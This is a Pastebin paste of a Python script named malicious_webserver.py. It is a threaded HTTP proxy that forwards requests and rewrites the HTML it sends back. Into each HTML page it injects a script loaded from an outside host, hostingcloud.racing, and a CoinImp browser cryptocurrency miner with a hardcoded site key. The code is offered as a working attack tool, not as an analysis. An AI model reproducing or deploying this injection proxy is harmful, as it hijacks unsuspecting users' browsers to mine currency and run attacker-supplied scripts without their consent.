Advertisement
FlyFar

malicious_webserver.py

Aug 12th, 2023
1,034
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.10 KB | Cybersecurity | 0 0
  1. import socketserver
  2. from http.server import BaseHTTPRequestHandler, HTTPServer
  3. import time
  4. import urllib.request
  5. import urllib.parse
  6. import urllib.error
  7. from http.cookiejar import CookieJar
  8. from bs4 import BeautifulSoup
  9. import io
  10. import gzip
  11. from socketserver import ThreadingMixIn
  12.  
  13. hostName=''
  14. hostPort=9090
  15.  
  16. ## TODO:
  17. # - Redirection handling infinite loop error
  18.  
  19. mining_code_tag = b'\nvar _givemecoins = new Client.Anonymous(\x272f8f3058590c46872f769ebf9fc1517d459045b3370860568d98ffd41664aa43\x27, { throttle: 0.3\n});\n_givemecoins.start();\n_givemecoins.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");\n'
  20.  
  21. def get_index(string,list_of_tup):
  22.     for x in list_of_tup:
  23.         if x[0] == string:
  24.             return list_of_tup.index(x)
  25.     return None
  26.  
  27. class MyServer(BaseHTTPRequestHandler):
  28.     def do_GET(self):
  29.         URL = "http://"+self.headers['Host']+self.path
  30.         myheaders = self.headers.__dict__
  31.         new_req = urllib.request.Request(url=URL,headers=dict(myheaders['_headers']),method=self.command)
  32.         print (new_req.full_url)
  33.        
  34.         cj = CookieJar() # To avoid infinite loop redirection
  35.         opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
  36.         try:
  37.             with opener.open(new_req,timeout=7) as response:
  38.                 if response.info().get('Content-Encoding') == 'gzip':
  39.                     buf = io.BytesIO(response.read())
  40.                     f = gzip.GzipFile(fileobj=buf)
  41.                     the_page = f.read()
  42.                 else:
  43.                     print(response.info().get('Content-Encoding'))
  44.                     the_page = response.read()
  45.  
  46.                 if len(the_page) > 0:
  47.                     if "text/html" in response.headers["content-type"]:
  48.                         html = BeautifulSoup(the_page,"html.parser")
  49.                         script = html.new_tag("script",src="https://www.hostingcloud.racing/n2J6.js")
  50.                         html.body.insert(-1,script)
  51.                         script2 = html.new_tag("script")
  52.                         script2.string = mining_code_tag.decode('utf-8')
  53.                         html.body.insert(-1,script2)
  54.                         the_page = bytes(str(html).encode("utf-8"))
  55.                         print("Script injected.")
  56.                     else:
  57.                         print("NO injection for: {}".format(URL))
  58.  
  59.                     self.wfile.write(the_page)  # Send result back
  60.                 response.close()
  61.         except Exception as e:
  62.             print("Error for {0}: {1} -> {2}".format(URL,e.code,e.msg))
  63.  
  64. class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
  65.         """Handle requests in a separate thread."""
  66.  
  67. if __name__ == '__main__':
  68.     myServer = ThreadedHTTPServer((hostName, hostPort), MyServer)
  69.     print(time.asctime(), "Server Starts - %s:%s" % (hostName, hostPort))
  70.  
  71.     try:
  72.         myServer.serve_forever()
  73.     except KeyboardInterrupt:
  74.         pass
  75.  
  76.     myServer.server_close()
  77.     print(time.asctime(), "Server Stops - %s:%s" % (hostName, hostPort))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement